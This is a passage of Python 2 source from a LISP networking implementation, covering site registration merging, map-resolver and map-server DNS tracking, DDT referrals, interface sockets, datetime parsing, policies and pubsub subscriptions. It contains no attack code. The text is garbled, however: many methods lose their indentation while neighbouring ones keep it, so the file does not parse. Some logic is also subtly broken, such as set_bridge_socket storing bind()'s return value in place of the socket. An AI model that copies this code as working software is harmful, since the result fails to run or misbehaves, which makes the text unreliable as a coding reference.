        self.echo_nonce_capable = False
        self.use_register_ttl_requested = False
        self.merge_register_requested = False
        self.xtr_id_present = False
        self.xtr_id = 0
        self.site_id = 0
        # Accept-more-specifics (AMS) parent/child relationship.
        self.accept_more_specifics = False
        self.parent_for_more_specifics = None
        self.dynamic = False
        self.more_specific_registrations = []
        self.source_cache = None
        self.inconsistent_registration = False
        self.policy = None
        self.require_signature = False
    #enddef
    def print_eid_tuple(self):
        """Return the "(eid, group)" display string for this site entry."""
        return(lisp_print_eid_tuple(self.eid, self.group))
    #enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
    def copy_state_to_parent(self, child):
        """
        Copy registration state from an individual (per-xTR) child
        registration into this merged parent entry.
        """
        self.xtr_id = child.xtr_id
        self.site_id = child.site_id
        self.first_registered = child.first_registered
        self.last_registered = child.last_registered
        self.last_registerer = child.last_registerer
        self.register_ttl = child.register_ttl
        # First transition to registered stamps first_registered.
        if (self.registered == False):
            self.first_registered = lisp_get_timestamp()
        #endif
        self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
        self.registered = child.registered
        self.proxy_reply_requested = child.proxy_reply_requested
        self.lisp_sec_present = child.lisp_sec_present
        self.xtr_id_present = child.xtr_id_present
        self.use_register_ttl_requested = child.use_register_ttl_requested
        self.merge_register_requested = child.merge_register_requested
        self.mobile_node_requested = child.mobile_node_requested
        self.map_notify_requested = child.map_notify_requested
    #enddef
    def build_sort_key(self):
        """
        Build a sortable string key for this entry from the cache key
        of its EID (and group, when present), with the mask-length
        spliced in so prefixes sort in longest-match order.
        """
        sort_cache = lisp_cache()
        ml, key = sort_cache.build_key(self.eid)
        gkey = ""
        if (self.group.is_null() == False):
            gml, gkey = sort_cache.build_key(self.group)
            gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
        #endif
        key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
        del(sort_cache)
        return(key)
    #enddef
    def merge_in_site_eid(self, child):
        """
        Merge the individual registrations into this parent entry:
        RLOCs for unicast entries, RLEs for (S,G) entries. Returns True
        when the merged RLE set changed.
        """
        rle_changed = False
        if (self.group.is_null()):
            self.merge_rlocs_in_site_eid()
        else:
            rle_changed = self.merge_rles_in_site_eid()
        #endif
        #
        # If a child registration was passed, copy some fields to the parent
        # copy.
        #
        if (child != None):
            self.copy_state_to_parent(child)
            self.map_registers_received += 1
        #endif
        return(rle_changed)
    #enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
    def merge_rlocs_in_site_eid(self):
        """
        Rebuild registered_rlocs as the union of all individual
        registrations for this site-id, de-duplicating RLOC addresses.
        Clears the registered flag when the merged set is empty.
        """
        self.registered_rlocs = []
        for site_eid in self.individual_registrations.values():
            if (self.site_id != site_eid.site_id): continue
            if (site_eid.registered == False): continue
            self.registered_rlocs += site_eid.copy_rloc_records()
        #endfor
        #
        # Remove duplicate RLOC addresses if multiple ETRs registered with
        # the same RTR-set.
        #
        # NOTE(review): like do_rloc_sets_match(), the dedup below uses
        # the leaked inner loop variable 're' as a "no duplicate found"
        # sentinel — confirm the first entry of new_list can never alias
        # its last.
        #
        new_list = []
        for rloc_entry in self.registered_rlocs:
            if (rloc_entry.rloc.is_null() or len(new_list) == 0):
                new_list.append(rloc_entry)
                continue
            #endif
            for re in new_list:
                if (re.rloc.is_null()): continue
                if (rloc_entry.rloc.is_exact_match(re.rloc)): break
            #endfor
            if (re == new_list[-1]): new_list.append(rloc_entry)
        #endfor
        self.registered_rlocs = new_list
        #
        # Removal case.
        #
        if (len(self.registered_rlocs) == 0): self.registered = False
        return
    #enddef
    def merge_rles_in_site_eid(self):
        """
        Merge the RLEs of all individual (S,G) registrations into the
        first RLOC-record of the merged set. Returns True when the
        merged RLE node set changed from the previous one.
        """
        #
        # Build temporary old list of RLE nodes in dictionary array.
        #
        old_rle = {}
        for rloc_entry in self.registered_rlocs:
            if (rloc_entry.rle == None): continue
            for rle_node in rloc_entry.rle.rle_nodes:
                addr = rle_node.address.print_address_no_iid()
                old_rle[addr] = rle_node.address
            #endfor
            break
        #endif
        #
        # Merge in all RLOC entries of an RLOC-set.
        #
        self.merge_rlocs_in_site_eid()
        #
        # Remove RLEs that were added as RLOC-records in merge_rlocs_in_
        # site_eid(). We only care about the first RLE that is the merged
        # set of all the individual registered RLEs. We assume this appears
        # first and that all subsequent RLOC-records are the RTR list for
        # each registering ETR.
        #
        new_rloc_list = []
        for rloc_entry in self.registered_rlocs:
            if (self.registered_rlocs.index(rloc_entry) == 0):
                new_rloc_list.append(rloc_entry)
                continue
            #endif
            if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
        #endfor
        self.registered_rlocs = new_rloc_list
        #
        # Merge RLEs from individuals into master copy and make a temporary
        # new_rle list to compare with old_rle. If there is a RLOC-name for
        # the RLE, clear it from the merged registration. We want names to
        # be per RLE entry and not the RLOC record entry it resides in.
        #
        rle = lisp_rle("")
        new_rle = {}
        rloc_name = None
        for site_eid in self.individual_registrations.values():
            if (site_eid.registered == False): continue
            irle = site_eid.registered_rlocs[0].rle
            if (irle == None): continue
            rloc_name = site_eid.registered_rlocs[0].rloc_name
            for irle_node in irle.rle_nodes:
                addr = irle_node.address.print_address_no_iid()
                if (new_rle.has_key(addr)): break
                rle_node = lisp_rle_node()
                rle_node.address.copy_address(irle_node.address)
                rle_node.level = irle_node.level
                rle_node.rloc_name = rloc_name
                rle.rle_nodes.append(rle_node)
                new_rle[addr] = irle_node.address
            #endfor
        #endfor
        #
        # Store new copy.
        #
        if (len(rle.rle_nodes) == 0): rle = None
        if (len(self.registered_rlocs) != 0):
            self.registered_rlocs[0].rle = rle
            if (rloc_name): self.registered_rlocs[0].rloc_name = None
        #endif
        #
        # Check for changes.
        #
        # NOTE(review): in Python 2, dict.keys() returns lists in
        # arbitrary order, so equal key sets in different order compare
        # unequal here and report an RLE change — confirm this
        # conservative behavior is intended.
        #
        if (old_rle.keys() == new_rle.keys()): return(False)
        lprint("{} {} from {} to {}".format( \
            green(self.print_eid_tuple(), False), bold("RLE change", False),
            old_rle.keys(), new_rle.keys()))
        return(True)
    #enddef
    def add_cache(self):
        """
        Insert this site-EID into the registration cache. (S,G)
        entries are stored as source entries under a (*,G) parent
        created on demand.
        """
        if (self.group.is_null()):
            lisp_sites_by_eid.add_cache(self.eid, self)
        else:
            se = lisp_sites_by_eid.lookup_cache(self.group, True)
            if (se == None):
                se = lisp_site_eid(self.site)
                se.eid.copy_address(self.group)
                se.group.copy_address(self.group)
                lisp_sites_by_eid.add_cache(self.group, se)
                #
                # See lisp_site_eid_lookup() for special case details for
                # longest match looks for (S,G) entries.
                #
                se.parent_for_more_specifics = self.parent_for_more_specifics
            #endif
            if (self.eid.is_null()): self.eid.make_default_route(se.group)
            se.add_source_entry(self)
        #endif
    #enddef
    def delete_cache(self):
        """
        Remove this site-EID from the registration cache. For an (S,G),
        remove the source entry and the (*,G) parent when it empties.
        """
        if (self.group.is_null()):
            lisp_sites_by_eid.delete_cache(self.eid)
        else:
            se = lisp_sites_by_eid.lookup_cache(self.group, True)
            if (se == None): return
            site_eid = se.lookup_source_cache(self.eid, True)
            if (site_eid == None): return
            if (se.source_cache == None): return
            se.source_cache.delete_cache(self.eid)
            if (se.source_cache.cache_size() == 0):
                lisp_sites_by_eid.delete_cache(self.group)
            #endif
        #endif
    #enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
    def is_rloc_in_rloc_set(self, rloc):
        """
        True when address 'rloc' appears in the registered rloc-set,
        either as an RLOC-record address or inside an RLE node.
        """
        for rloc_entry in self.registered_rlocs:
            if (rloc_entry.rle):
                # Check each RLE node of a multicast replication entry.
                for rle in rloc_entry.rle.rle_nodes:
                    if (rle.address.is_exact_match(rloc)): return(True)
                #endif
            #endif
            if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
        #endfor
        return(False)
    #enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
    """
    A configured map-resolver, either by address or by DNS name (in
    which case the address is resolved periodically). Keyed into the
    global lisp_map_resolvers_list by "<mr-name><address>".
    """
    def __init__(self, addr_str, dns_name, mr_name):
        """One of addr_str or dns_name identifies the resolver."""
        self.mr_name = mr_name if (mr_name != None) else "all"
        self.dns_name = dns_name
        self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.last_dns_resolve = None
        # Index of the DNS A-record this instance tracks.
        self.a_record_index = 0
        if (addr_str):
            self.map_resolver.store_address(addr_str)
            self.insert_mr()
        else:
            self.resolve_dns_name()
        #endif
        self.last_used = 0
        self.last_reply = 0
        self.last_nonce = 0
        self.map_requests_sent = 0
        self.neg_map_replies_received = 0
        self.total_rtt = 0
    #enddef
    def resolve_dns_name(self):
        """
        Re-resolve self.dns_name (at most every 30 seconds) and keep
        the global map-resolver list in sync with the returned
        A-records: update this entry's address, create entries for new
        A-records (LISP-Decent pull case), and delete stale ones.
        """
        if (self.dns_name == None): return
        if (self.last_dns_resolve and
            time.time() - self.last_dns_resolve < 30): return
        try:
            addresses = socket.gethostbyname_ex(self.dns_name)
            self.last_dns_resolve = lisp_get_timestamp()
            a_records = addresses[2]
        except:
            return
        #endtry
        #
        # Check if number of A-records have changed and this one is no longer
        # valid.
        #
        if (len(a_records) <= self.a_record_index):
            self.delete_mr()
            return
        #endif
        addr = a_records[self.a_record_index]
        if (addr != self.map_resolver.print_address_no_iid()):
            self.delete_mr()
            self.map_resolver.store_address(addr)
            self.insert_mr()
        #endif
        #
        # If pull-based decent DNS suffix, then create other lisp_mr() for
        # all A-records. Only have master to this (A-record index 0).
        #
        if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
        if (self.a_record_index != 0): return
        for addr in a_records[1::]:
            a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
            mr = lisp_get_map_resolver(a, None)
            if (mr != None and mr.a_record_index == a_records.index(addr)):
                continue
            #endif
            mr = lisp_mr(addr, None, None)
            mr.a_record_index = a_records.index(addr)
            mr.dns_name = self.dns_name
            mr.last_dns_resolve = lisp_get_timestamp()
        #endfor
        #
        # Check for deletes.
        #
        delete_list = []
        for mr in lisp_map_resolvers_list.values():
            if (self.dns_name != mr.dns_name): continue
            a = mr.map_resolver.print_address_no_iid()
            if (a in a_records): continue
            delete_list.append(mr)
        #endfor
        for mr in delete_list: mr.delete_mr()
    #enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
    """
    A configured DDT root node: its RLOC address, public key, and
    priority/weight used for root selection.
    """
    def __init__(self):
        self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.public_key = ""
        self.priority = 0
        self.weight = 0
    #enddef
#endclass
class lisp_referral():
    """
    One entry of the DDT referral cache: an EID (and group) with the
    set of referral nodes learned from a Map-Referral, the referral
    action/type, and expiry state.
    """
    def __init__(self):
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        # referral_set maps address strings to lisp_referral_node()s.
        self.referral_set = {}
        self.referral_type = LISP_DDT_ACTION_NULL
        self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.referral_ttl = 0
        self.uptime = lisp_get_timestamp()
        self.expires = 0
        self.source_cache = None
    #enddef
    def print_referral(self, eid_indent, referral_indent):
        """
        Log a one-line summary of this referral entry followed by one
        line per referral node, using the supplied indent strings.
        """
        uts = lisp_print_elapsed(self.uptime)
        ets = lisp_print_future(self.expires)
        lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
            format(eid_indent, green(self.eid.print_prefix(), False), uts,
            ets, len(self.referral_set)))
        for ref_node in self.referral_set.values():
            ref_node.print_ref_node(referral_indent)
        #endfor
    #enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
    def print_eid_tuple(self):
        """Return the "(eid, group)" display string for this referral."""
        return(lisp_print_eid_tuple(self.eid, self.group))
    #enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
    def add_cache(self):
        """
        Insert this referral into the referral cache. (S,G) entries
        hang off a (*,G) parent created on demand.
        """
        if (self.group.is_null()):
            lisp_referral_cache.add_cache(self.eid, self)
        else:
            ref = lisp_referral_cache.lookup_cache(self.group, True)
            if (ref == None):
                ref = lisp_referral()
                ref.eid.copy_address(self.group)
                ref.group.copy_address(self.group)
                lisp_referral_cache.add_cache(self.group, ref)
            #endif
            if (self.eid.is_null()): self.eid.make_default_route(ref.group)
            ref.add_source_entry(self)
        #endif
    #enddef
    def delete_cache(self):
        """
        Remove this referral from the referral cache. For an (S,G),
        remove the source entry and the (*,G) parent when it empties.
        """
        if (self.group.is_null()):
            lisp_referral_cache.delete_cache(self.eid)
        else:
            ref = lisp_referral_cache.lookup_cache(self.group, True)
            if (ref == None): return
            sref = ref.lookup_source_cache(self.eid, True)
            if (sref == None): return
            ref.source_cache.delete_cache(self.eid)
            if (ref.source_cache.cache_size() == 0):
                lisp_referral_cache.delete_cache(self.group)
            #endif
        #endif
    #enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
    """
    One node of a referral set: the DDT node's address, up/down state,
    and priority/weight for selection.
    """
    def __init__(self):
        self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.priority = 0
        self.weight = 0
        self.updown = True
        self.map_requests_sent = 0
        self.no_responses = 0
        self.uptime = lisp_get_timestamp()
    #enddef
    def print_ref_node(self, indent):
        """Log a one-line summary of this referral node."""
        ts = lisp_print_elapsed(self.uptime)
        lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
            indent, red(self.referral_address.print_address(), False), ts,
            "up" if self.updown else "down", self.priority, self.weight))
    #enddef
#endclass
class lisp_ms():
    """
    A configured map-server, by address or DNS name, with the
    authentication and registration behavior to use when registering
    to it. Keyed into lisp_map_servers_list by "<ms-name><address>".
    """
    def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
        mr, rr, wmn, site_id, ekey_id, ekey):
        """
        pr/mr/rr/wmn: proxy-reply, merge-registrations,
        refresh-registrations, want-map-notify booleans.
        """
        self.ms_name = ms_name if (ms_name != None) else "all"
        self.dns_name = dns_name
        self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.last_dns_resolve = None
        self.a_record_index = 0
        # All map-servers share one xtr-id; reuse the first one's.
        # NOTE(review): dict.values()[0] is Python-2 only; confirm
        # before any Python-3 port.
        if (lisp_map_servers_list == {}):
            self.xtr_id = lisp_get_control_nonce()
        else:
            self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
        #endif
        self.alg_id = alg_id
        self.key_id = key_id
        self.password = pw
        self.proxy_reply = pr
        self.merge_registrations = mr
        self.refresh_registrations = rr
        self.want_map_notify = wmn
        self.site_id = site_id
        self.map_registers_sent = 0
        self.map_registers_multicast_sent = 0
        self.map_notifies_received = 0
        self.map_notify_acks_sent = 0
        self.ekey_id = ekey_id
        self.ekey = ekey
        if (addr_str):
            self.map_server.store_address(addr_str)
            self.insert_ms()
        else:
            self.resolve_dns_name()
        #endif
    #enddef
    def resolve_dns_name(self):
        """
        Re-resolve self.dns_name (at most every 30 seconds) and keep
        the global map-server list in sync with the returned A-records:
        update this entry's address, clone entries for new A-records
        (LISP-Decent pull case), and delete stale ones.
        """
        if (self.dns_name == None): return
        if (self.last_dns_resolve and
            time.time() - self.last_dns_resolve < 30): return
        try:
            addresses = socket.gethostbyname_ex(self.dns_name)
            self.last_dns_resolve = lisp_get_timestamp()
            a_records = addresses[2]
        except:
            return
        #endtry
        #
        # Check if number of A-records have changed and this one is no longer
        # valid.
        #
        if (len(a_records) <= self.a_record_index):
            self.delete_ms()
            return
        #endif
        addr = a_records[self.a_record_index]
        if (addr != self.map_server.print_address_no_iid()):
            self.delete_ms()
            self.map_server.store_address(addr)
            self.insert_ms()
        #endif
        #
        # If pull-based decent DNS suffix, then create other lisp_ms() for
        # all A-records. Only have master to this (A-record index 0).
        #
        if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
        if (self.a_record_index != 0): return
        for addr in a_records[1::]:
            a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
            ms = lisp_get_map_server(a)
            if (ms != None and ms.a_record_index == a_records.index(addr)):
                continue
            #endif
            ms = copy.deepcopy(self)
            ms.map_server.store_address(addr)
            ms.a_record_index = a_records.index(addr)
            ms.last_dns_resolve = lisp_get_timestamp()
            ms.insert_ms()
        #endfor
        #
        # Check for deletes.
        #
        delete_list = []
        for ms in lisp_map_servers_list.values():
            if (self.dns_name != ms.dns_name): continue
            a = ms.map_server.print_address_no_iid()
            if (a in a_records): continue
            delete_list.append(ms)
        #endfor
        for ms in delete_list: ms.delete_ms()
    #enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
    """
    Per-interface state: raw/bridge sockets for packet injection,
    instance-id, and optional dynamic-EID and multi-tenant EID
    configuration.
    """
    def __init__(self, device):
        """device: the OS interface name (e.g. "eth0")."""
        self.interface_name = ""
        self.device = device
        self.instance_id = None
        self.bridge_socket = None
        self.raw_socket = None
        self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.dynamic_eid_device = None
        self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
        self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #enddef
    def add_interface(self):
        """Register this interface in the global interface table by device."""
        lisp_myinterfaces[self.device] = self
    #enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s = s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
    """Wall-clock timestamp of the form "YYYY-MM-DD-HH:MM:SS".

    Used by policy match clauses for datetime ranges. The timestamp is
    also stored as the integer YYYYMMDDHHMMSS so instances compare
    chronologically with plain integer comparison.
    """
    def __init__(self, datetime_str):
        self.datetime_name = datetime_str
        self.datetime = None
        self.parse_datetime()
    #enddef
    def valid_datetime(self):
        """Syntactically validate datetime_name, returning True/False.

        Bug fix: the original range checks used 'and' (e.g.
        month < "01" and month > "12"), a condition that can never be
        true, so out-of-range fields were accepted. Use 'or'. Also
        reject a time field that does not have exactly three
        colon-separated components (the original would raise on it).
        """
        ds = self.datetime_name
        if (ds.find(":") == -1): return(False)
        if (ds.find("-") == -1): return(False)
        year, month, day, hhmmss = ds[0:4], ds[5:7], ds[8:10], ds[11::]
        if ((year + month + day).isdigit() == False): return(False)
        if (month < "01" or month > "12"): return(False)
        if (day < "01" or day > "31"): return(False)
        if (hhmmss.count(":") != 2): return(False)
        hour, mi, sec = hhmmss.split(":")
        if ((hour + mi + sec).isdigit() == False): return(False)
        if (hour < "00" or hour > "23"): return(False)
        if (mi < "00" or mi > "59"): return(False)
        if (sec < "00" or sec > "59"): return(False)
        return(True)
    #enddef
    def parse_datetime(self):
        """Strip punctuation and store the integer form YYYYMMDDHHMMSS."""
        dt = self.datetime_name
        dt = dt.replace("-", "")
        dt = dt.replace(":", "")
        self.datetime = int(dt)
    #enddef
    def now(self):
        """Return a new lisp_datetime for the current local time."""
        ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
        ts = lisp_datetime(ts)
        return(ts)
    #enddef
    def print_datetime(self):
        """Return the original datetime string."""
        return(self.datetime_name)
    #enddef
    def future(self):
        """True when this timestamp is later than the current time."""
        return(self.datetime > self.now().datetime)
    #enddef
    def past(self):
        """True when this timestamp is now or earlier."""
        return(self.future() == False)
    #enddef
    def now_in_range(self, upper):
        """True when current time lies between this timestamp and 'upper'."""
        return(self.past() and upper.future())
    #enddef
    def this_year(self):
        """True when this timestamp falls within the current year."""
        now = str(self.now().datetime)[0:4]
        ts = str(self.datetime)[0:4]
        return(ts == now)
    #enddef
    def this_month(self):
        """True when this timestamp falls within the current month."""
        now = str(self.now().datetime)[0:6]
        ts = str(self.datetime)[0:6]
        return(ts == now)
    #enddef
    def today(self):
        """True when this timestamp falls within the current day."""
        now = str(self.now().datetime)[0:8]
        ts = str(self.datetime)[0:8]
        return(ts == now)
    #enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match():
    """One 'match' clause of a configured LISP policy.

    Every criterion starts as None, which acts as a wildcard: a clause
    only constrains the fields that are explicitly configured.
    """
    def __init__(self):
        for criterion in ("source_eid", "dest_eid", "source_rloc",
            "dest_rloc", "rloc_record_name", "geo_name", "elp_name",
            "rle_name", "json_name", "datetime_lower", "datetime_upper"):
            setattr(self, criterion, None)
        #endfor
    #enddef
#endclass
class lisp_policy():
    """A configured LISP policy: a list of match clauses plus a set of
    'set-' actions applied to matching Map-Requests/Map-Replies.
    Policies are stored in the global lisp_policies dict by name."""
    def __init__(self, policy_name):
        self.policy_name = policy_name
        self.match_clauses = []
        self.set_action = None
        self.set_record_ttl = None
        self.set_source_eid = None
        self.set_dest_eid = None
        self.set_rloc_address = None
        self.set_rloc_record_name = None
        self.set_geo_name = None
        self.set_elp_name = None
        self.set_rle_name = None
        self.set_json_name = None
    #enddef
    def match_policy_map_request(self, mr, srloc):
        """Return True when Map-Request 'mr' (with source RLOC 'srloc')
        satisfies at least one match clause. Within a clause, 'p' is
        the policy criterion and 't' the tested value; a None criterion
        is a wildcard, so a clause matches when no configured criterion
        rejects it (criteria AND together, clauses OR together)."""
        for m in self.match_clauses:
            p = m.source_eid
            t = mr.source_eid
            if (p and t and t.is_more_specific(p) == False): continue
            p = m.dest_eid
            t = mr.target_eid
            if (p and t and t.is_more_specific(p) == False): continue
            p = m.source_rloc
            t = srloc
            if (p and t and t.is_more_specific(p) == False): continue
            l = m.datetime_lower
            u = m.datetime_upper
            if (l and u and l.now_in_range(u) == False): continue
            return(True)
        #endfor
        return(False)
    #enddef
    def set_policy_map_reply(self):
        """Build a lisp_rloc() populated from this policy's 'set-'
        values, for insertion in a Map-Reply. Returns None when no
        RLOC-related set action is configured. Each unknown name is
        flagged '(not configured)' in the log but still applied."""
        all_none = (self.set_rloc_address == None and
            self.set_rloc_record_name == None and self.set_geo_name == None and
            self.set_elp_name == None and self.set_rle_name == None)
        if (all_none): return(None)
        rloc = lisp_rloc()
        if (self.set_rloc_address):
            rloc.rloc.copy_address(self.set_rloc_address)
            addr = rloc.rloc.print_address_no_iid()
            lprint("Policy set-rloc-address to {}".format(addr))
        #endif
        if (self.set_rloc_record_name):
            rloc.rloc_name = self.set_rloc_record_name
            name = blue(rloc.rloc_name, False)
            lprint("Policy set-rloc-record-name to {}".format(name))
        #endif
        if (self.set_geo_name):
            rloc.geo_name = self.set_geo_name
            name = rloc.geo_name
            not_found = "" if lisp_geo_list.has_key(name) else \
                "(not configured)"
            lprint("Policy set-geo-name '{}' {}".format(name, not_found))
        #endif
        if (self.set_elp_name):
            rloc.elp_name = self.set_elp_name
            name = rloc.elp_name
            not_found = "" if lisp_elp_list.has_key(name) else \
                "(not configured)"
            lprint("Policy set-elp-name '{}' {}".format(name, not_found))
        #endif
        if (self.set_rle_name):
            rloc.rle_name = self.set_rle_name
            name = rloc.rle_name
            not_found = "" if lisp_rle_list.has_key(name) else \
                "(not configured)"
            lprint("Policy set-rle-name '{}' {}".format(name, not_found))
        #endif
        if (self.set_json_name):
            rloc.json_name = self.set_json_name
            name = rloc.json_name
            not_found = "" if lisp_json_list.has_key(name) else \
                "(not configured)"
            lprint("Policy set-json-name '{}' {}".format(name, not_found))
        #endif
        return(rloc)
    #enddef
    def save_policy(self):
        """Store this policy in the global lisp_policies dict by name."""
        lisp_policies[self.policy_name] = self
    #enddef
#endclass
class lisp_pubsub():
    """Subscription state for a Map-Request with the subscribe bit set.

    Entries live in the two-level global lisp_pubsub_cache, keyed first
    by EID-prefix string and then by subscriber xtr-id, so later
    mapping changes can trigger Map-Notify messages to the ITR.
    """
    def __init__(self, itr, port, nonce, ttl, xtr_id):
        self.itr = itr                           # lisp_address of subscriber
        self.port = port                         # subscriber UDP port
        self.nonce = nonce                       # nonce from Map-Request
        self.uptime = lisp_get_timestamp()
        self.ttl = ttl                           # subscription lifetime
        self.xtr_id = xtr_id                     # subscriber's xTR-ID
        self.map_notify_count = 0
    #enddef
    def add(self, eid_prefix):
        """Add (or replace) this subscription for 'eid_prefix' in
        lisp_pubsub_cache. An existing entry for the same xtr-id is
        removed first so the log can report "Replace"."""
        ttl = self.ttl
        eid = eid_prefix.print_prefix()
        if (lisp_pubsub_cache.has_key(eid) == False):
            lisp_pubsub_cache[eid] = {}
        #endif
        pubsub = lisp_pubsub_cache[eid]
        ar = "Add"
        if (pubsub.has_key(self.xtr_id)):
            ar = "Replace"
            del(pubsub[self.xtr_id])
        #endif
        pubsub[self.xtr_id] = self
        eid = green(eid, False)
        itr = red(self.itr.print_address_no_iid(), False)
        xtr_id = "0x" + lisp_hex_string(self.xtr_id)
        lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
            itr, xtr_id, ttl))
    #enddef
    def delete(self, eid_prefix):
        """Remove this xtr-id's subscription for 'eid_prefix', if any.
        Silently does nothing when no matching state exists."""
        eid = eid_prefix.print_prefix()
        itr = red(self.itr.print_address_no_iid(), False)
        xtr_id = "0x" + lisp_hex_string(self.xtr_id)
        if (lisp_pubsub_cache.has_key(eid)):
            pubsub = lisp_pubsub_cache[eid]
            if (pubsub.has_key(self.xtr_id)):
                pubsub.pop(self.xtr_id)
                lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
                    itr, xtr_id))
            #endif
        #endif
    #enddef
#endclass
#
# lisp_trace
#
